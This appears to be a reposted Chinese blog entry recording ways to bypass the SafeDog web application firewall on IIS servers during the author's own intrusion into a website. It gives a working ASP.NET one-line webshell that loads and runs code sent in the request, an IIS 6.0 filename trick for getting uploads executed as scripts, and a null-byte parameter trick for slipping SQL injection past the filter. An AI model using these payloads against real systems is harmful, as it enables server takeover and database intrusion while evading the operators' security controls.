您的位置:首页 > 其它

突破安全狗的一些记录

2013-10-15 00:45 155 查看
1、绕过IIS安全狗的一句话。

前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。

<%@ Page Language="C#" ValidateRequest="false" %>

<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["t00ls"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
连接端用cncert的aspx一句话客户端。

2、IIS6.0解析漏洞遇到安全狗。

文件名为http://www.2cto.com /1.asp;1.jpg。

这样的会被IIS安全狗果断屏蔽。

改成如下名称,IIS6一样会解析: http://www.2cto.com /;1.asp;1.jpg

3、安全狗的注入绕过。

常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。

但如果:

seo.asp?seo.com=%00.&id=69%20 and 1=1就可以成功绕过了
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: